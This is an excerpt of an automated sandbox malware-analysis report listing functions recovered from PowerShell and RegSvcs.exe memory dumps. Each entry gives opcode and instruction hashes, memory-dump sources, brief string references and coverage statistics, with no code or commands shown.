Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80c6be18d4f4c0a42840e733fca8f70cd85cd142c0185199cb2786b9c511360b
Instruction ID: aa00f91f8003a1e5f9dda100c4d46da8fd207e8b36a7df70bad7bc28a0eb7376
Opcode Fuzzy Hash: 80c6be18d4f4c0a42840e733fca8f70cd85cd142c0185199cb2786b9c511360b
Instruction Fuzzy Hash: 45F03771A20605CFC728CF6AC548A9ABBF2BF8C301F208569D406AB3A0CB30AC45CF40

Function 08274688 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458400994.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce67fcd1dd61f08d666eccb8ba7a991c6b4804be42d2f49e8b23e93796c32cb5
Instruction ID: 0fa8204e9b4cce840a77ecee5745dd4bce6bf585d6f2cb19bd3472b9bc6a7147
Opcode Fuzzy Hash: ce67fcd1dd61f08d666eccb8ba7a991c6b4804be42d2f49e8b23e93796c32cb5
Instruction Fuzzy Hash: 16F0A072500B05ABD321DB59E804B86BBA5FF84755F14C22AE1088B681DBB1A850C7D1

Function 082A6DA0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2870d6a6ebb2117c0d1e13d050282c14cee4ce85c33f364b3d1a7b9fb20a952d
Instruction ID: 8fb7ba94dd9fd03009d635790a7f2423ea1384ff8d354e41e1b4fe401e36fe5b
Opcode Fuzzy Hash: 2870d6a6ebb2117c0d1e13d050282c14cee4ce85c33f364b3d1a7b9fb20a952d
Instruction Fuzzy Hash: AAF0A736E08205AFC719DF68E91569D7BBD9F88311F1480BFD456D3282DA384500CF54

Function 082A37E7 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c90defd549c60389dca5328788f416dba40ed2c932350318ed0e0f302968fb
Instruction ID: 6c1191d13066783971b904016ffefbb3104d12753eac3873683d41f228fdb860
Opcode Fuzzy Hash: 05c90defd549c60389dca5328788f416dba40ed2c932350318ed0e0f302968fb
Instruction Fuzzy Hash: 8FE06D219153889ECF11CEB089442E97FF4AF19201F1511EBC804DA251EA388B86A761

Function 082AC836 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffae16497f60ad92d06d12066a4a71debe9fc6d6b6c341dcd0fd3b1d602137a3
Instruction ID: b18f75ec1136b17abd3cd77a9651e54ca771887005e9058d98ab712a7c1dd406
Opcode Fuzzy Hash: ffae16497f60ad92d06d12066a4a71debe9fc6d6b6c341dcd0fd3b1d602137a3
Instruction Fuzzy Hash: 84E086377504206BC314A54AE942AA6B799EBC5B22718812AE819C7700CE19DD538BD4

Function 082A6DB0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a531d225f5a1755aba162d23420c768ed08299ad139ba1e66b2af920110a6e91
Instruction ID: 2f51dc0f66a7996a3f17506340b6e9915a5c3deb3d8eaf594ded940f6c07adcc
Opcode Fuzzy Hash: a531d225f5a1755aba162d23420c768ed08299ad139ba1e66b2af920110a6e91
Instruction Fuzzy Hash: 5BE01232F04119ABCB19DE99E80979E77BDDB88361F04807EE416D3340DA789900CF54

Function 0827D648 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458400994.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57120a44b44229f879f01ff4cfdb9ab866a0e5de1203eb790f0a3fbb3f29f6ef
Instruction ID: 86db909cfe92ebbeca6ebae6ef676a1d979c2434e6e17a7ee34504aa864973d4
Opcode Fuzzy Hash: 57120a44b44229f879f01ff4cfdb9ab866a0e5de1203eb790f0a3fbb3f29f6ef
Instruction Fuzzy Hash: 43E0D8716153148FC7399739E4006A57396AF82225B0449AED05E8B651CB76FC81C780

Function 083E0760 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1460251143.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_83e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b76428d989b83b94e4d546b30006ac7c45645c59596239f15b4c4cc34789abc
Instruction ID: db46021010515cad1707a3f23150ab37b4563e647ecd1ad21b2130d636905246
Opcode Fuzzy Hash: 0b76428d989b83b94e4d546b30006ac7c45645c59596239f15b4c4cc34789abc
Instruction Fuzzy Hash: 4FE0EC36300424574618A69EB4549AEF7DEDBC5666318807FE60DC3751DE62DD038AE4

Function 0810B878 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1454961540.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99eea7dbe355a5c0ad8f77e407f9fb02bba3b563dcecefa932bafdb8ff3b620f
Instruction ID: 8b4692741017a3333e83b41afad3b2e091791e2939034b556f9496cd5f12aff4
Opcode Fuzzy Hash: 99eea7dbe355a5c0ad8f77e407f9fb02bba3b563dcecefa932bafdb8ff3b620f
Instruction Fuzzy Hash: 01F039719042199BDF249FA8C919BEEBBB5EF48311F10056AD501B32E0CBB90D04DBE5

Function 0836456F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9da465754477040b369bd5b2ecfabd88530bb2fb8c074b7a762820ef2e71237b
Instruction ID: 8da550af9b4bde998c3864111ce7832d40ac9b4a1200b2920ffd6437e59aca1f
Opcode Fuzzy Hash: 9da465754477040b369bd5b2ecfabd88530bb2fb8c074b7a762820ef2e71237b
Instruction Fuzzy Hash: 7BD05EB24563914BEF93093E91CC7C53FE08B26151F4943AED4C6C754BD969800E4B41

Function 082AC848 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ddf309d33bb6765f70ee8282611f945c353d73061f59c62db90a2cf22b07cc
Instruction ID: 376faba742fb78b621679f9ecd7919a39a615a429546d03caa5f1363b82e3954
Opcode Fuzzy Hash: 15ddf309d33bb6765f70ee8282611f945c353d73061f59c62db90a2cf22b07cc
Instruction Fuzzy Hash: A3D017367154245B8215AA9EF84086AF79AEBC9A36318807FE91DC7300CE66EC0387D0

Function 082A3961 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82f32e5ef60b0ac50e6cd2f9bb2752e07a2366f71de5a4448a546a9476c20fdb
Instruction ID: 3fa09b792a0baf890bc700081a9b5896bdb6f2dedae93e12182fcb3774eeae7c
Opcode Fuzzy Hash: 82f32e5ef60b0ac50e6cd2f9bb2752e07a2366f71de5a4448a546a9476c20fdb
Instruction Fuzzy Hash: 92E0DF213097928BD306A2699590759AFAF4FD712171A10BBD209DB393CE14881A83A6

Function 08103E80 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1454961540.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4d5ecc88ae98e66a9d92370a06be40cb8ec43b560c5a56cfd0d7d94fbb7392
Instruction ID: 0efcaa4d248992887bbfad9c22bee65c6a1e7db5bdae89a285bd8e0128810bee
Opcode Fuzzy Hash: db4d5ecc88ae98e66a9d92370a06be40cb8ec43b560c5a56cfd0d7d94fbb7392
Instruction Fuzzy Hash: 1DE0D8311083948FC702DB64DC18A447FB4DF46215B0540DBED44C7363C62458008761

Function 08199960 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1455354910.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8190000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a16cecf8f1c410575493bc5f8f5265a106c1a7b52e0a9da527199e250a8f0a29
Instruction ID: ec02e182148b6f31823e5d0a79c2928861102b8141f35b4a6c030c352a083ca0
Opcode Fuzzy Hash: a16cecf8f1c410575493bc5f8f5265a106c1a7b52e0a9da527199e250a8f0a29
Instruction Fuzzy Hash: DAE048351083886FDB038FA0DC118AA7F71AF4B210B09C086FD544A163C637D922EBA1

Function 08174044 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1455228661.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8170000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d19624947cd00566510df34d6b69fd914feb2d1137187f5533c7738266182655
Instruction ID: ff1c0164a4d519a8fa7d8a6b2b3d4ce2407909405cc097329bc8b390f970e36b
Opcode Fuzzy Hash: d19624947cd00566510df34d6b69fd914feb2d1137187f5533c7738266182655
Instruction Fuzzy Hash: 28E0DF71A002068BDF00DFA4E9456EE73B4EF80302F004529D119A7680CB35A9058B52

Function 08276170 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458400994.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e93e69fdf6c11806e0946f3fa56a5194e1458eb3346db7fec3147bb8a581ba
Instruction ID: 66d179e343b17ca2289f5ce9563b30687a66bb5805e03a528c19cbda4a63622e
Opcode Fuzzy Hash: 37e93e69fdf6c11806e0946f3fa56a5194e1458eb3346db7fec3147bb8a581ba
Instruction Fuzzy Hash: A6E0CD33A18044EFCB1217D5E8194BDBF39FB48111B0480D7FD5686552C5354616DB61

Function 0817410E Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1455228661.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8170000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2400668f5f3a1d569ff04b18e9e41510015d9cd7aef5c9e19a206283b5150343
Instruction ID: fd0469acefa88a8f239e38bdcc872ccd8578c15c11d8d2fb3ebcf91fc5497b9e
Opcode Fuzzy Hash: 2400668f5f3a1d569ff04b18e9e41510015d9cd7aef5c9e19a206283b5150343
Instruction Fuzzy Hash: 89E08C762006008BEB10ABA4E8457AD33A9EF84312F444A2DD11A97680CB79A84A9B46

Function 082743E2 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458400994.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a5b70101b68b48ebe35fda7f0de7dc31fce9f6da0c7c3051a95e2c86e30bcb5
Instruction ID: 6987d3f8f367e736b04e3ea99a83666e11bf1fb4cb89245bf5d4134e4bc286b4
Opcode Fuzzy Hash: 4a5b70101b68b48ebe35fda7f0de7dc31fce9f6da0c7c3051a95e2c86e30bcb5
Instruction Fuzzy Hash: 5BD0A7B71542466FD310572AE812FA17F6CEF61202F08C0E1F640CF562DA25E84187F4

Function 083ED128 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1460251143.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_83e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb3521802a246401fee75d96e7cd25bad8232a414cebd22a9cf46f1fb24b93d5
Instruction ID: b6d99aa4949b51ed16a4b9419d686df292ecfe717b89bf04ff145bc641b13c4e
Opcode Fuzzy Hash: cb3521802a246401fee75d96e7cd25bad8232a414cebd22a9cf46f1fb24b93d5
Instruction Fuzzy Hash: 74D05E35200124AFC704AB68F848E957BE9EF49325F0101A8EA0987322CB21AC408B91

Function 0810C052 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1454961540.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca6419d61a5cb05e484b429a95a8d5b9a91109e0296265314e7c2f8609f0e114
Instruction ID: 48a47c00ebd2b9d40e0896c4cc708bf112a94560f7385680988709be881df369
Opcode Fuzzy Hash: ca6419d61a5cb05e484b429a95a8d5b9a91109e0296265314e7c2f8609f0e114
Instruction Fuzzy Hash: FDE08C2000C7C09FC7038F20882081ABFB55F93200B0980DEE8D5C70A3C5384810C722

Function 081013BB Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1454961540.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00f55ea94f0312d19acf77896c0ef03c351e2e71a799d99d9bd2d63153061379
Instruction ID: e060b2aece242fb73053d0921a68529ec718a083e569888cda9fb1a64beffc94
Opcode Fuzzy Hash: 00f55ea94f0312d19acf77896c0ef03c351e2e71a799d99d9bd2d63153061379
Instruction Fuzzy Hash: F3D05E311092A09FCB039A2998100A1BFBA6E8B11532D80CBE0C8CB257C216CD43CBA1

Function 08108498 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1454961540.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0886a1e27331723b9d2fc8135897a53ef778c2ac25aa9a386ce8adcbc02fb928
Instruction ID: 3ba6339f1a8c612f93b5f82286afa141eac63912bde8a37df855da462a8e509f
Opcode Fuzzy Hash: 0886a1e27331723b9d2fc8135897a53ef778c2ac25aa9a386ce8adcbc02fb928
Instruction Fuzzy Hash: 94D09E7420A3C29FC7028724C555A05FFB2AF8620431DD2C6D8C4CB267C724DC95C751

Function 08199970 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1455354910.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8190000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65b382f2b373dd0e42861b0c7a885679bbca07c8995822aa41ad6b5fde29ea02
Instruction ID: 2f1addc7ac752b055209e5a892d08ee60b8d95dd5987d24a20b0db1062a2c8ce
Opcode Fuzzy Hash: 65b382f2b373dd0e42861b0c7a885679bbca07c8995822aa41ad6b5fde29ea02
Instruction Fuzzy Hash: CFD06736104249AF8B01CE84D951C6A7F6AEB49214B14C049BE5946262C633E932EBA0

Function 08279803 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458400994.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3543594cefebbad7f357d94d4ca891486bb79a0d67da2a61fdfd292c73342e8f
Instruction ID: ecbe0af8a8be55cbc0d5620e3453c071e345c119538ad247a0733782475e3a8a
Opcode Fuzzy Hash: 3543594cefebbad7f357d94d4ca891486bb79a0d67da2a61fdfd292c73342e8f
Instruction Fuzzy Hash: 4FC0023A650008CF9708DE9AE5458D8BBB4EF98322B5100E6E6119B621C771AD64CA64

Function 0827DDBE Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458400994.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43818f807133d8bab741be7b541db21677062fb684113f991754bfd4e1ec4ae6
Instruction ID: 9b5dbb4f01591099bcf71f40365390c1f281de0f92106d5475130019daff8084
Opcode Fuzzy Hash: 43818f807133d8bab741be7b541db21677062fb684113f991754bfd4e1ec4ae6
Instruction Fuzzy Hash: 15C09B7704004DDFCB51DE84D0458DD3755EF59251B014155FD5D47130DB359575DF82

Function 08271581 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458400994.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f8da564eeb5c884cfa6dbc3604ce9181a48ccc25d5a76b0eeb88db0bb23be7c
Instruction ID: d2ba5466db88fe1e0624daf72c3e642361f0c833f4b8d6434394646911a3c0e4
Opcode Fuzzy Hash: 6f8da564eeb5c884cfa6dbc3604ce9181a48ccc25d5a76b0eeb88db0bb23be7c
Instruction Fuzzy Hash: 95B012EBD9050462DF405520DE8D7F1379BDBD0213F08D062A050C4840DC2EC3C36654

Function 083645A0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5daea410c37a099174eb18eb18c90e61fa86387bb723ba32c7635ef75512080b
Instruction ID: 2fd9b17d68f5892484b492e3c2d9b1d579cbe304b768877c740c31ffcef5c7d2
Opcode Fuzzy Hash: 5daea410c37a099174eb18eb18c90e61fa86387bb723ba32c7635ef75512080b
Instruction Fuzzy Hash: DDA0223020030CCB828032B2300888A3B0CC8C88223808828E00C83000CF3AF88080C0

Non-executed Functions

Function 08364600 Relevance: 5.2, Strings: 4, Instructions: 224COMMON

Download Yara Rule

Strings

^Cq, xrefs: 083648A6
^Cq, xrefs: 0836480F
^Cq, xrefs: 08364720
^Cq, xrefs: 083646A9

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID: ^Cq$^Cq$^Cq$^Cq
API String ID: 0-3586655959
Opcode ID: 15fcd4f59d6d9fb28722af4242e3042cfea6efee93998899ed196e936341d07e
Instruction ID: cf287e8982003a816e01905921578e2202038e56ef0a02705f2d04a42b13c5d0
Opcode Fuzzy Hash: 15fcd4f59d6d9fb28722af4242e3042cfea6efee93998899ed196e936341d07e
Instruction Fuzzy Hash: 4B816A34F007059FE728DB39C984B2A7BA2AFC8611F14C42DD9569B788DB35E811CB68

Function 083689C8 Relevance: 7.6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

Strings

Ld<q, xrefs: 08368A22
Ld<q, xrefs: 08368AD6
Ld<q, xrefs: 08368ACA
Ld<q, xrefs: 08368A16
Ld<q, xrefs: 08368A51
Ld<q, xrefs: 08368A5D

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID: Ld<q$Ld<q$Ld<q$Ld<q$Ld<q$Ld<q
API String ID: 0-104022482
Opcode ID: 1870438476c0d5b6bb2434b7a8fcafe4f40ee221fc0d0cab0bc51a55d86da25d
Instruction ID: a5e13b50d66ad345d015232570dd5ab3fe49528274956eeb414b8b9f48a155c0
Opcode Fuzzy Hash: 1870438476c0d5b6bb2434b7a8fcafe4f40ee221fc0d0cab0bc51a55d86da25d
Instruction Fuzzy Hash: 5B316B317142009FDB149E2DD558A2A77EAAFCC662729C079ED06CB3A8DE71CC12C722

Function 08367AB8 Relevance: 5.2, Strings: 4, Instructions: 223COMMON

Download Yara Rule

Strings

"Cq, xrefs: 08367D6A
Ld<q, xrefs: 08367B50
Ld<q, xrefs: 08367B44
"Cq, xrefs: 08367AD2

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID: "Cq$"Cq$Ld<q$Ld<q
API String ID: 0-167475433
Opcode ID: e9e082c7c021d0636c58c8dc6984eaf67da96bd18b2279d3290000629a1d2c9d
Instruction ID: 63e017426b81fabd2d0c38cb7eb41e7afd21a52164c6f88c41abbbb9e3af8235
Opcode Fuzzy Hash: e9e082c7c021d0636c58c8dc6984eaf67da96bd18b2279d3290000629a1d2c9d
Instruction Fuzzy Hash: 5B912A74B002048FDB04DF69D998AAEBBF6EFC8211B548169D806DB395DF74DC41CBA1

Function 08272120 Relevance: 5.2, Strings: 4, Instructions: 185COMMON

Download Yara Rule

Strings

cj^, xrefs: 082722F1
Sj^, xrefs: 08272235
Cj^, xrefs: 08272252
sj^, xrefs: 082722CB

Memory Dump Source

Source File: 0000000D.00000002.1458400994.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID: Cj^$Sj^$cj^$sj^
API String ID: 0-88648233
Opcode ID: 92ca805680c79b74922ceb97e3c15dce7200950663beec4f4d1bb34c4a8f7e8b
Instruction ID: aaa41000d02eb3cef43f5d89c379a0e0b13f2a40b555e8d25815ec0bc36230ac
Opcode Fuzzy Hash: 92ca805680c79b74922ceb97e3c15dce7200950663beec4f4d1bb34c4a8f7e8b
Instruction Fuzzy Hash: C0715A70600706DBDB05EF64C88069EB7F2FF85215B148A69C429AF306DB75F925CBE2

Analysis Process: RegSvcs.exePID: 8160, Parent PID: 7924COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	32.1%
Total number of Nodes:	28
Total number of Limit Nodes:	6

Executed Functions

Function 00DE54E8 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2533217410.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_de0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e763b6c51c99c6f6502ded89e4d16372db5f02f5db4e8712b523782dc7da775d
Instruction ID: a7484f956e488459be8baaf42314cf73e5fc3902596d5a1b32d919bc2e4c5c72
Opcode Fuzzy Hash: e763b6c51c99c6f6502ded89e4d16372db5f02f5db4e8712b523782dc7da775d
Instruction Fuzzy Hash: FCF1F374E00218CFEB14EFA9D884B9DFBB2BF88344F5481A9D448AB355DB319985CF60

Function 00E4A168 Relevance: 1.5, Strings: 1, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5, xrefs: 00E4A448

Memory Dump Source

Source File: 00000010.00000002.2533969284.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e40000_RegSvcs.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-3632891597
Opcode ID: 82bb66866cb7e021847821736f9a0908c11673b79a41cdda6730b102023b8d5d
Instruction ID: 4fde22e977bd105d165cf07c896ebf45e094ce823e737d1b207edb31b918f353
Opcode Fuzzy Hash: 82bb66866cb7e021847821736f9a0908c11673b79a41cdda6730b102023b8d5d
Instruction Fuzzy Hash: 7DA1A174E01228CFEB28CF6AD944B9DBBF2AF89310F14D0AAD409B7255DB745A85CF11

Function 00E494C8 Relevance: 1.5, Strings: 1, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5, xrefs: 00E497A8

Memory Dump Source

Source File: 00000010.00000002.2533969284.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e40000_RegSvcs.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-3632891597
Opcode ID: c76b91749c8bcaec3fb707f089426d7002c0b3b6b4d0e5ff4b7dee556e4db256
Instruction ID: 8c69beab94c267555be12fc18729d04a221654f8c5e3f0b57cc999b99cf849e2
Opcode Fuzzy Hash: c76b91749c8bcaec3fb707f089426d7002c0b3b6b4d0e5ff4b7dee556e4db256
Instruction Fuzzy Hash: F6A18274E012188FEB28CF6AD944BDEBBF2AF89300F14D0AAD409B7255DB745A85CF51

Function 00E47B98 Relevance: 1.5, Strings: 1, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5, xrefs: 00E47E79

Memory Dump Source

Source File: 00000010.00000002.2533969284.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e40000_RegSvcs.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-3632891597
Opcode ID: dd7f32d02ae95f38ebaa8bd8543b65fdd5ca78d0e677946b792d1ae024040144
Instruction ID: 0a2a01981c76bea66612cb0fbdf31af0758e6070f67d5f1aa751b6b4c8b71a0a
Opcode Fuzzy Hash: dd7f32d02ae95f38ebaa8bd8543b65fdd5ca78d0e677946b792d1ae024040144
Instruction Fuzzy Hash: EFA19074E01228CFEB28CF6AD944B9DBBF2AF89300F14D1AAD409B7254DB745A85CF51

Function 00E49B18 Relevance: 1.5, Strings: 1, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5, xrefs: 00E49DF8

Memory Dump Source

Source File: 00000010.00000002.2533969284.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e40000_RegSvcs.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-3632891597
Opcode ID: 675c4a7fb70a59f02fca29fb1cde3d31c77efe06a87f5db76f2a577511dcb7d7
Instruction ID: 074137319efc726a4768b570831a5d7decab6955867f431e9b986ef03cc677ec
Opcode Fuzzy Hash: 675c4a7fb70a59f02fca29fb1cde3d31c77efe06a87f5db76f2a577511dcb7d7
